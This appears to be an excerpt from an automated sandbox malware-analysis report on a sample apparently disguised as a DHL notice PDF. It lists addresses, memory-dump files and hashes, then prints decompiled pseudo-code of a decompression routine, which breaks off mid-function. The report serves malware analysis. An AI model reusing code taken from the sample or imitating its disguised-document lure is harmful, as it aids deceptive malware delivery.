                                                            0x004071f1
                                                            0x004071f6
                                                            0x0040722e
                                                            0x0040722e
                                                            0x00407232
                                                            0x0040725e
                                                            0x00407260
                                                            0x00407267
                                                            0x0040726a
                                                            0x0040726d
                                                            0x0040726d
                                                            0x00407272
                                                            0x00407272
                                                            0x00407274
                                                            0x00407277
                                                            0x0040727e
                                                            0x00407281
                                                            0x004072ae
                                                            0x004072ae
                                                            0x004072b1
                                                            0x004072b4
                                                            0x00407328
                                                            0x00407328
                                                            0x00407328
                                                            0x00000000
                                                            0x00407328
                                                            0x004072b6
                                                            0x004072bc
                                                            0x004072bf
                                                            0x004072c2
                                                            0x004072c5
                                                            0x004072c8
                                                            0x004072cb
                                                            0x004072ce
                                                            0x004072d1
                                                            0x004072d4
                                                            0x004072d7
                                                            0x004072f0
                                                            0x004072f2
                                                            0x004072f5
                                                            0x004072f6
                                                            0x004072f9
                                                            0x004072fb
                                                            0x004072fe
                                                            0x00407300
                                                            0x00407302
                                                            0x00407305
                                                            0x00407307
                                                            0x0040730a
                                                            0x0040730e
                                                            0x00407310
                                                            0x00407310
                                                            0x00407311
                                                            0x00407314
                                                            0x00407317
                                                            0x004072d9
                                                            0x004072d9
                                                            0x004072e1
                                                            0x004072e6
                                                            0x004072e8
                                                            0x004072eb
                                                            0x004072eb
                                                            0x0040731a
                                                            0x00407321
                                                            0x004072ab
                                                            0x004072ab
                                                            0x004072ab
                                                            0x004072ab
                                                            0x00000000
                                                            0x00407323
                                                            0x00000000
                                                            0x00407323
                                                            0x00407321
                                                            0x00407234
                                                            0x00407237
                                                            0x00407239
                                                            0x0040723c
                                                            0x0040723f
                                                            0x00407242
                                                            0x00407244
                                                            0x00407247
                                                            0x0040724a
                                                            0x0040724a
                                                            0x0040724d
                                                            0x0040724d
                                                            0x00407250
                                                            0x00407257
                                                            0x0040722b
                                                            0x0040722b
                                                            0x0040722b
                                                            0x0040722b
                                                            0x00000000
                                                            0x00407259
                                                            0x00000000
                                                            0x00407259
                                                            0x00407257
                                                            0x004071dd
                                                            0x004071e0
                                                            0x004071e2
                                                            0x004071e5
                                                            0x00000000
                                                            0x00000000
                                                            0x00406f44
                                                            0x00406f44
                                                            0x00406f48
                                                            0x0040758d
                                                            0x00000000
                                                            0x0040758d
                                                            0x00406f4e
                                                            0x00406f51
                                                            0x00406f54
                                                            0x00406f57
                                                            0x00406f5a
                                                            0x00406f5d
                                                            0x00406f60
                                                            0x00406f62
                                                            0x00406f65
                                                            0x00406f68
                                                            0x00406f6b
                                                            0x00406f6d
                                                            0x00406f6d
                                                            0x00406f6d
                                                            0x00000000
                                                            0x00000000
                                                            0x004070cf
                                                            0x004070cf
                                                            0x004070d3
                                                            0x00407599
                                                            0x00000000
                                                            0x00407599
                                                            0x004070d9
                                                            0x004070dc
                                                            0x004070df
                                                            0x004070e2
                                                            0x004070e4
                                                            0x004070e4
                                                            0x004070e4
                                                            0x004070e7
                                                            0x004070ea
                                                            0x004070ed
                                                            0x004070f0
                                                            0x004070f3
                                                            0x004070f6
                                                            0x004070f7
                                                            0x004070f9
                                                            0x004070f9
                                                            0x004070f9
                                                            0x004070fc
                                                            0x004070ff
                                                            0x00407102
                                                            0x00407105
                                                            0x00407105
                                                            0x00407105
                                                            0x00407108
                                                            0x0040710a
                                                            0x0040710a
                                                            0x00000000
                                                            0x00000000
                                                            0x0040734c
                                                            0x0040734c
                                                            0x0040734c
                                                            0x00407350
                                                            0x00000000
                                                            0x00000000
                                                            0x00407356
                                                            0x00407359
                                                            0x0040735c
                                                            0x0040735f
                                                            0x00407361
                                                            0x00407361
                                                            0x00407361
                                                            0x00407364
                                                            0x00407367
                                                            0x0040736a
                                                            0x0040736d
                                                            0x00407370
                                                            0x00407373
                                                            0x00407374
                                                            0x00407376
                                                            0x00407376
                                                            0x00407376
                                                            0x00407379
                                                            0x0040737c
                                                            0x0040737f
                                                            0x00407382
                                                            0x00407385
                                                            0x00407389
                                                            0x0040738b
                                                            0x0040738e
                                                            0x00000000
                                                            0x00407390
                                                            0x0040710d
                                                            0x0040710d
                                                            0x00000000
                                                            0x0040710d
                                                            0x0040738e
                                                            0x004075c3
                                                            0x004075e5
                                                            0x004075eb
                                                            0x004075ed
                                                            0x004075f4
                                                            0x004075f6
                                                            0x004075fd
                                                            0x00407601
                                                            0x00000000
                                                            0x00406bf2
                                                            0x004075fa
                                                            0x004075fa
                                                            0x00000000
                                                            0x004075fa
                                                            0x00407447
                                                            0x004074cd
                                                            0x004074d3
                                                            0x004074d6
                                                            0x004074d9
                                                            0x004074dc
                                                            0x004074df
                                                            0x004074e2
                                                            0x004074e5
                                                            0x004074e8
                                                            0x004074ee
                                                            0x00407507
                                                            0x0040750a
                                                            0x0040750d
                                                            0x00407510
                                                            0x00407514
                                                            0x00407516
                                                            0x00407517
                                                            0x0040751a
                                                            0x004074f0
                                                            0x004074f0
                                                            0x004074f8
                                                            0x004074fd
                                                            0x004074ff
                                                            0x00407502
                                                            0x00407502
                                                            0x00407524
                                                            0x00000000
                                                            0x00407526
                                                            0x00000000
                                                            0x00407526
                                                            0x00407524
                                                            0x00000000
                                                            0x00407399

                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.248820039.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.248815920.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.248830182.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.248836994.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.248836994.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.248836994.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.248836994.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.248836994.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.248873061.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_DHL_Notice_pdf.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 97748a737734167d5846b9d8dd4738ada3f75d0b833fdafa89234df63502b4a5
                                                            • Instruction ID: d49815ad38d406b3cd0a1a90ea7be1526168d9e39684835ffa6a026ef1ef4849
                                                            • Opcode Fuzzy Hash: 97748a737734167d5846b9d8dd4738ada3f75d0b833fdafa89234df63502b4a5
                                                            • Instruction Fuzzy Hash: 91913270D04228DBEF28CF98C8547ADBBB1FF44305F14816AD856BB281D778A986DF45
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 004070AB Relevance: 5.2, APIs: 4, Instructions: 205COMMON
                                                            Download Yara Rule
                                                            C-Code - Quality: 98%
                                                            			E004070AB() {
				unsigned short _t532;
				signed int _t533;
				void _t534;
				void* _t535;
				signed int _t536;
				signed int _t565;
				signed int _t568;
				signed int _t589;
				signed int* _t606;
				void* _t613;

				L0:
				while(1) {
					L0:
					if( *(_t613 - 0x40) != 0) {
						L89:
						 *((intOrPtr*)(_t613 - 0x80)) = 0x15;
						 *(_t613 - 0x58) =  *(_t613 - 4) + 0xa68;
						L69:
						_t606 =  *(_t613 - 0x58);
						 *(_t613 - 0x84) = 0x12;
						L132:
						 *(_t613 - 0x54) = _t606;
						L133:
						_t532 =  *_t606;
						_t589 = _t532 & 0x0000ffff;
						_t565 = ( *(_t613 - 0x10) >> 0xb) * _t589;
						if( *(_t613 - 0xc) >= _t565) {
							 *(_t613 - 0x10) =  *(_t613 - 0x10) - _t565;
							 *(_t613 - 0xc) =  *(_t613 - 0xc) - _t565;
							 *(_t613 - 0x40) = 1;
							_t533 = _t532 - (_t532 >> 5);
							 *_t606 = _t533;
						} else {
							 *(_t613 - 0x10) = _t565;
							 *(_t613 - 0x40) =  *(_t613 - 0x40) & 0x00000000;
							 *_t606 = (0x800 - _t589 >> 5) + _t532;
						}
						if( *(_t613 - 0x10) >= 0x1000000) {
							L139:
							_t534 =  *(_t613 - 0x84);
							L140:
							 *(_t613 - 0x88) = _t534;
							goto L1;
						} else {
							L137:
							if( *(_t613 - 0x6c) == 0) {
								 *(_t613 - 0x88) = 5;
								goto L170;
							}
							 *(_t613 - 0x10) =  *(_t613 - 0x10) << 8;
							 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
							 *(_t613 - 0x70) =  &(( *(_t613 - 0x70))[1]);
							 *(_t613 - 0xc) =  *(_t613 - 0xc) << 0x00000008 |  *( *(_t613 - 0x70)) & 0x000000ff;
							goto L139;
						}
					} else {
						if( *(__ebp - 0x60) == 0) {
							L171:
							_t536 = _t535 | 0xffffffff;
							L172:
							return _t536;
						}
						__eax = 0;
						_t258 =  *(__ebp - 0x38) - 7 >= 0;
						0 | _t258 = _t258 + _t258 + 9;
						 *(__ebp - 0x38) = _t258 + _t258 + 9;
						L75:
						if( *(__ebp - 0x64) == 0) {
							 *(__ebp - 0x88) = 0x1b;
							L170:
							_t568 = 0x22;
							memcpy( *(_t613 - 0x90), _t613 - 0x88, _t568 << 2);
							_t536 = 0;
							goto L172;
						}
						__eax =  *(__ebp - 0x14);
						__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
						if(__eax >=  *(__ebp - 0x74)) {
							__eax = __eax +  *(__ebp - 0x74);
						}
						__edx =  *(__ebp - 8);
						__cl =  *(__eax + __edx);
						__eax =  *(__ebp - 0x14);
						 *(__ebp - 0x5c) = __cl;
						 *(__eax + __edx) = __cl;
						__eax = __eax + 1;
						__edx = 0;
						_t274 = __eax %  *(__ebp - 0x74);
						__eax = __eax /  *(__ebp - 0x74);
						__edx = _t274;
						__eax =  *(__ebp - 0x68);
						 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
						 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
						_t283 = __ebp - 0x64;
						 *_t283 =  *(__ebp - 0x64) - 1;
						 *( *(__ebp - 0x68)) = __cl;
						L79:
						 *(__ebp - 0x14) = __edx;
						L80:
						 *(__ebp - 0x88) = 2;
					}
					L1:
					_t535 =  *(_t613 - 0x88);
					if(_t535 > 0x1c) {
						goto L171;
					}
					switch( *((intOrPtr*)(_t535 * 4 +  &M00407602))) {
						case 0:
							if( *(_t613 - 0x6c) == 0) {
								goto L170;
							}
							 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
							 *(_t613 - 0x70) =  &(( *(_t613 - 0x70))[1]);
							_t535 =  *( *(_t613 - 0x70));
							if(_t535 > 0xe1) {
								goto L171;
							}
							_t539 = _t535 & 0x000000ff;
							_push(0x2d);
							asm("cdq");
							_pop(_t570);
							_push(9);
							_pop(_t571);
							_t609 = _t539 / _t570;
							_t541 = _t539 % _t570 & 0x000000ff;
							asm("cdq");
							_t604 = _t541 % _t571 & 0x000000ff;
							 *(_t613 - 0x3c) = _t604;
							 *(_t613 - 0x1c) = (1 << _t609) - 1;
							 *((intOrPtr*)(_t613 - 0x18)) = (1 << _t541 / _t571) - 1;
							_t612 = (0x300 << _t604 + _t609) + 0x736;
							if(0x600 ==  *((intOrPtr*)(_t613 - 0x78))) {
								L10:
								if(_t612 == 0) {
									L12:
									 *(_t613 - 0x48) =  *(_t613 - 0x48) & 0x00000000;
									 *(_t613 - 0x40) =  *(_t613 - 0x40) & 0x00000000;
									goto L15;
								} else {
									goto L11;
								}
								do {
									L11:
									_t612 = _t612 - 1;
									 *((short*)( *(_t613 - 4) + _t612 * 2)) = 0x400;
								} while (_t612 != 0);
								goto L12;
							}
							if( *(_t613 - 4) != 0) {
								GlobalFree( *(_t613 - 4));
							}
							_t535 = GlobalAlloc(0x40, 0x600); // executed
							 *(_t613 - 4) = _t535;
							if(_t535 == 0) {
								goto L171;
							} else {
								 *((intOrPtr*)(_t613 - 0x78)) = 0x600;
								goto L10;
							}
						case 1:
							L13:
							__eflags =  *(_t613 - 0x6c);
							if( *(_t613 - 0x6c) == 0) {
								 *(_t613 - 0x88) = 1;
								goto L170;
							}
							 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
							 *(_t613 - 0x40) =  *(_t613 - 0x40) | ( *( *(_t613 - 0x70)) & 0x000000ff) <<  *(_t613 - 0x48) << 0x00000003;
							 *(_t613 - 0x70) =  &(( *(_t613 - 0x70))[1]);
							_t45 = _t613 - 0x48;
							 *_t45 =  *(_t613 - 0x48) + 1;
							__eflags =  *_t45;
							L15:
							if( *(_t613 - 0x48) < 4) {
								goto L13;
							}
							_t547 =  *(_t613 - 0x40);
							if(_t547 ==  *(_t613 - 0x74)) {
								L20:
								 *(_t613 - 0x48) = 5;
								 *( *(_t613 - 8) +  *(_t613 - 0x74) - 1) =  *( *(_t613 - 8) +  *(_t613 - 0x74) - 1) & 0x00000000;
								goto L23;
							}
							 *(_t613 - 0x74) = _t547;
							if( *(_t613 - 8) != 0) {
								GlobalFree( *(_t613 - 8));
							}
							_t535 = GlobalAlloc(0x40,  *(_t613 - 0x40)); // executed
							 *(_t613 - 8) = _t535;
							if(_t535 == 0) {
								goto L171;
							} else {
								goto L20;
							}
						case 2:
							L24:
							_t554 =  *(_t613 - 0x60) &  *(_t613 - 0x1c);
							 *(_t613 - 0x84) = 6;
							 *(_t613 - 0x4c) = _t554;
							_t606 =  *(_t613 - 4) + (( *(_t613 - 0x38) << 4) + _t554) * 2;
							goto L132;
						case 3:
							L21:
							__eflags =  *(_t613 - 0x6c);
							if( *(_t613 - 0x6c) == 0) {
								 *(_t613 - 0x88) = 3;
								goto L170;
							}
							 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
							_t67 = _t613 - 0x70;
							 *_t67 =  &(( *(_t613 - 0x70))[1]);
							__eflags =  *_t67;
							 *(_t613 - 0xc) =  *(_t613 - 0xc) << 0x00000008 |  *( *(_t613 - 0x70)) & 0x000000ff;
							L23:
							 *(_t613 - 0x48) =  *(_t613 - 0x48) - 1;
							if( *(_t613 - 0x48) != 0) {
								goto L21;
							}
							goto L24;
						case 4:
							goto L133;
						case 5:
							goto L137;
						case 6:
							__edx = 0;
							__eflags =  *(__ebp - 0x40);
							if( *(__ebp - 0x40) != 0) {
								__eax =  *(__ebp - 4);
								__ecx =  *(__ebp - 0x38);
								 *(__ebp - 0x34) = 1;
								 *(__ebp - 0x84) = 7;
								__esi =  *(__ebp - 4) + 0x180 +  *(__ebp - 0x38) * 2;
								goto L132;
							}
							__eax =  *(__ebp - 0x5c) & 0x000000ff;
							__esi =  *(__ebp - 0x60);
							__cl = 8;
							__cl = 8 -  *(__ebp - 0x3c);
							__esi =  *(__ebp - 0x60) &  *(__ebp - 0x18);
							__eax = ( *(__ebp - 0x5c) & 0x000000ff) >> 8;
							__ecx =  *(__ebp - 0x3c);
							__esi = ( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8;
							__ecx =  *(__ebp - 4);
							(( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2;
							__eax = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9;
							__eflags =  *(__ebp - 0x38) - 4;
							__eax = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
							 *(__ebp - 0x58) = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
							if( *(__ebp - 0x38) >= 4) {
								__eflags =  *(__ebp - 0x38) - 0xa;
								if( *(__ebp - 0x38) >= 0xa) {
									_t98 = __ebp - 0x38;
									 *_t98 =  *(__ebp - 0x38) - 6;
									__eflags =  *_t98;
								} else {
									 *(__ebp - 0x38) =  *(__ebp - 0x38) - 3;
								}
							} else {
								 *(__ebp - 0x38) = 0;
							}
							__eflags =  *(__ebp - 0x34) - __edx;
							if( *(__ebp - 0x34) == __edx) {
								__ebx = 0;
								__ebx = 1;
								goto L61;
							} else {
								__eax =  *(__ebp - 0x14);
								__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
								__eflags = __eax -  *(__ebp - 0x74);
								if(__eax >=  *(__ebp - 0x74)) {
									__eax = __eax +  *(__ebp - 0x74);
									__eflags = __eax;
								}
								__ecx =  *(__ebp - 8);
								__ebx = 0;
								__ebx = 1;
								__al =  *((intOrPtr*)(__eax + __ecx));
								 *(__ebp - 0x5b) =  *((intOrPtr*)(__eax + __ecx));
								goto L41;
							}
						case 7:
							__eflags =  *(__ebp - 0x40) - 1;
							if( *(__ebp - 0x40) != 1) {
								__eax =  *(__ebp - 0x24);
								 *(__ebp - 0x80) = 0x16;
								 *(__ebp - 0x20) =  *(__ebp - 0x24);
								__eax =  *(__ebp - 0x28);
								 *(__ebp - 0x24) =  *(__ebp - 0x28);
								__eax =  *(__ebp - 0x2c);
								 *(__ebp - 0x28) =  *(__ebp - 0x2c);
								__eax = 0;
								__eflags =  *(__ebp - 0x38) - 7;
								0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
								__al = __al & 0x000000fd;
								__eax = (__eflags >= 0) - 1 + 0xa;
								 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xa;
								__eax =  *(__ebp - 4);
								__eax =  *(__ebp - 4) + 0x664;
								__eflags = __eax;
								 *(__ebp - 0x58) = __eax;
								goto L69;
							}
							__eax =  *(__ebp - 4);
							__ecx =  *(__ebp - 0x38);
							 *(__ebp - 0x84) = 8;
							__esi =  *(__ebp - 4) + 0x198 +  *(__ebp - 0x38) * 2;
							goto L132;
						case 8:
							__eflags =  *(__ebp - 0x40);
							if( *(__ebp - 0x40) != 0) {
								__eax =  *(__ebp - 4);
								__ecx =  *(__ebp - 0x38);
								 *(__ebp - 0x84) = 0xa;
								__esi =  *(__ebp - 4) + 0x1b0 +  *(__ebp - 0x38) * 2;
							} else {
								__eax =  *(__ebp - 0x38);
								__ecx =  *(__ebp - 4);
								__eax =  *(__ebp - 0x38) + 0xf;
								 *(__ebp - 0x84) = 9;
								 *(__ebp - 0x38) + 0xf << 4 = ( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c);
								__esi =  *(__ebp - 4) + (( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c)) * 2;
							}
							goto L132;
						case 9:
							goto L0;
						case 0xa:
							__eflags =  *(__ebp - 0x40);
							if( *(__ebp - 0x40) != 0) {
								__eax =  *(__ebp - 4);
								__ecx =  *(__ebp - 0x38);
								 *(__ebp - 0x84) = 0xb;
								__esi =  *(__ebp - 4) + 0x1c8 +  *(__ebp - 0x38) * 2;
								goto L132;
							}
							__eax =  *(__ebp - 0x28);
							goto L88;
						case 0xb:
							__eflags =  *(__ebp - 0x40);
							if( *(__ebp - 0x40) != 0) {
								__ecx =  *(__ebp - 0x24);
								__eax =  *(__ebp - 0x20);
								 *(__ebp - 0x20) =  *(__ebp - 0x24);
							} else {
								__eax =  *(__ebp - 0x24);
							}
							__ecx =  *(__ebp - 0x28);
							 *(__ebp - 0x24) =  *(__ebp - 0x28);
							L88:
							__ecx =  *(__ebp - 0x2c);
							 *(__ebp - 0x2c) = __eax;
							 *(__ebp - 0x28) =  *(__ebp - 0x2c);
							goto L89;
						case 0xc:
							L99:
							__eflags =  *(__ebp - 0x6c);
							if( *(__ebp - 0x6c) == 0) {
								 *(__ebp - 0x88) = 0xc;
								goto L170;
							}
							__ecx =  *(__ebp - 0x70);
							__eax =  *(__ebp - 0xc);
							 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
							__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
							 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
							 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							_t334 = __ebp - 0x70;
							 *_t334 =  *(__ebp - 0x70) + 1;
							__eflags =  *_t334;
							 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							__eax =  *(__ebp - 0x2c);
							goto L101;
						case 0xd:
							L37:
							__eflags =  *(__ebp - 0x6c);
							if( *(__ebp - 0x6c) == 0) {
								 *(__ebp - 0x88) = 0xd;
								goto L170;
							}
							__ecx =  *(__ebp - 0x70);
							__eax =  *(__ebp - 0xc);
							 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
							__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
							 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
							 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							_t122 = __ebp - 0x70;
							 *_t122 =  *(__ebp - 0x70) + 1;
							__eflags =  *_t122;
							 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							L39:
							__eax =  *(__ebp - 0x40);
							__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
							if( *(__ebp - 0x48) !=  *(__ebp - 0x40)) {
								goto L48;
							}
							__eflags = __ebx - 0x100;
							if(__ebx >= 0x100) {
								goto L54;
							}
							L41:
							__eax =  *(__ebp - 0x5b) & 0x000000ff;
							 *(__ebp - 0x5b) =  *(__ebp - 0x5b) << 1;
							__ecx =  *(__ebp - 0x58);
							__eax = ( *(__ebp - 0x5b) & 0x000000ff) >> 7;
							 *(__ebp - 0x48) = __eax;
							__eax = __eax + 1;
							__eax = __eax << 8;
							__eax = __eax + __ebx;
							__esi =  *(__ebp - 0x58) + __eax * 2;
							 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
							__ax =  *__esi;
							 *(__ebp - 0x54) = __esi;
							__edx = __ax & 0x0000ffff;
							__ecx = ( *(__ebp - 0x10) >> 0xb) * __edx;
							__eflags =  *(__ebp - 0xc) - __ecx;
							if( *(__ebp - 0xc) >= __ecx) {
								 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
								 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
								__cx = __ax;
								 *(__ebp - 0x40) = 1;
								__cx = __ax >> 5;
								__eflags = __eax;
								__ebx = __ebx + __ebx + 1;
								 *__esi = __ax;
							} else {
								 *(__ebp - 0x40) =  *(__ebp - 0x40) & 0x00000000;
								 *(__ebp - 0x10) = __ecx;
								0x800 = 0x800 - __edx;
								0x800 - __edx >> 5 = (0x800 - __edx >> 5) + __eax;
								__ebx = __ebx + __ebx;
								 *__esi = __cx;
							}
							__eflags =  *(__ebp - 0x10) - 0x1000000;
							 *(__ebp - 0x44) = __ebx;
							if( *(__ebp - 0x10) >= 0x1000000) {
								goto L39;
							} else {
								goto L37;
							}
						case 0xe:
							L46:
							__eflags =  *(__ebp - 0x6c);
							if( *(__ebp - 0x6c) == 0) {
								 *(__ebp - 0x88) = 0xe;
								goto L170;
							}
							__ecx =  *(__ebp - 0x70);
							__eax =  *(__ebp - 0xc);
							 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
							__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
							 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
							 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							_t156 = __ebp - 0x70;
							 *_t156 =  *(__ebp - 0x70) + 1;
							__eflags =  *_t156;
							 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							while(1) {
								L48:
								__eflags = __ebx - 0x100;
								if(__ebx >= 0x100) {
									break;
								}
								__eax =  *(__ebp - 0x58);
								__edx = __ebx + __ebx;
								__ecx =  *(__ebp - 0x10);
								__esi = __edx + __eax;
								__ecx =  *(__ebp - 0x10) >> 0xb;
								__ax =  *__esi;
								 *(__ebp - 0x54) = __esi;
								__edi = __ax & 0x0000ffff;
								__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
								__eflags =  *(__ebp - 0xc) - __ecx;
								if( *(__ebp - 0xc) >= __ecx) {
									 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
									 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
									__cx = __ax;
									_t170 = __edx + 1; // 0x1
									__ebx = _t170;
									__cx = __ax >> 5;
									__eflags = __eax;
									 *__esi = __ax;
								} else {
									 *(__ebp - 0x10) = __ecx;
									0x800 = 0x800 - __edi;
									0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
									__ebx = __ebx + __ebx;
									 *__esi = __cx;
								}
								__eflags =  *(__ebp - 0x10) - 0x1000000;
								 *(__ebp - 0x44) = __ebx;
								if( *(__ebp - 0x10) >= 0x1000000) {
									continue;
								} else {
									goto L46;
								}
							}
							L54:
							_t173 = __ebp - 0x34;
							 *_t173 =  *(__ebp - 0x34) & 0x00000000;
							__eflags =  *_t173;
							goto L55;
						case 0xf:
							L58:
							__eflags =  *(__ebp - 0x6c);
							if( *(__ebp - 0x6c) == 0) {
								 *(__ebp - 0x88) = 0xf;
								goto L170;
							}
							__ecx =  *(__ebp - 0x70);
							__eax =  *(__ebp - 0xc);
							 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
							__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
							 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
							 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							_t203 = __ebp - 0x70;
							 *_t203 =  *(__ebp - 0x70) + 1;
							__eflags =  *_t203;
							 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							L60:
							__eflags = __ebx - 0x100;
							if(__ebx >= 0x100) {
								L55:
								__al =  *(__ebp - 0x44);
								 *(__ebp - 0x5c) =  *(__ebp - 0x44);
								goto L56;
							}
							L61:
							__eax =  *(__ebp - 0x58);
							__edx = __ebx + __ebx;
							__ecx =  *(__ebp - 0x10);
							__esi = __edx + __eax;
							__ecx =  *(__ebp - 0x10) >> 0xb;
							__ax =  *__esi;
							 *(__ebp - 0x54) = __esi;
							__edi = __ax & 0x0000ffff;
							__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
							__eflags =  *(__ebp - 0xc) - __ecx;
							if( *(__ebp - 0xc) >= __ecx) {
								 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
								 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
								__cx = __ax;
								_t217 = __edx + 1; // 0x1
								__ebx = _t217;
								__cx = __ax >> 5;
								__eflags = __eax;
								 *__esi = __ax;
							} else {
								 *(__ebp - 0x10) = __ecx;
								0x800 = 0x800 - __edi;
								0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
								__ebx = __ebx + __ebx;
								 *__esi = __cx;
							}
							__eflags =  *(__ebp - 0x10) - 0x1000000;
							 *(__ebp - 0x44) = __ebx;
							if( *(__ebp - 0x10) >= 0x1000000) {
								goto L60;
							} else {
								goto L58;
							}
						case 0x10:
							L109:
							__eflags =  *(__ebp - 0x6c);
							if( *(__ebp - 0x6c) == 0) {
								 *(__ebp - 0x88) = 0x10;
								goto L170;
							}
							__ecx =  *(__ebp - 0x70);
							__eax =  *(__ebp - 0xc);
							 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
							__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
							 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
							 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							_t365 = __ebp - 0x70;
							 *_t365 =  *(__ebp - 0x70) + 1;
							__eflags =  *_t365;
							 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							goto L111;
						case 0x11:
							goto L69;
						case 0x12:
							__eflags =  *(__ebp - 0x40);
							if( *(__ebp - 0x40) != 0) {
								__eax =  *(__ebp - 0x58);
								 *(__ebp - 0x84) = 0x13;
								__esi =  *(__ebp - 0x58) + 2;
								goto L132;
							}
							__eax =  *(__ebp - 0x4c);
							 *(__ebp - 0x30) =  *(__ebp - 0x30) & 0x00000000;
							__ecx =  *(__ebp - 0x58);
							__eax =  *(__ebp - 0x4c) << 4;
							__eflags = __eax;
							__eax =  *(__ebp - 0x58) + __eax + 4;
							goto L130;
						case 0x13:
							__eflags =  *(__ebp - 0x40);
							if( *(__ebp - 0x40) != 0) {
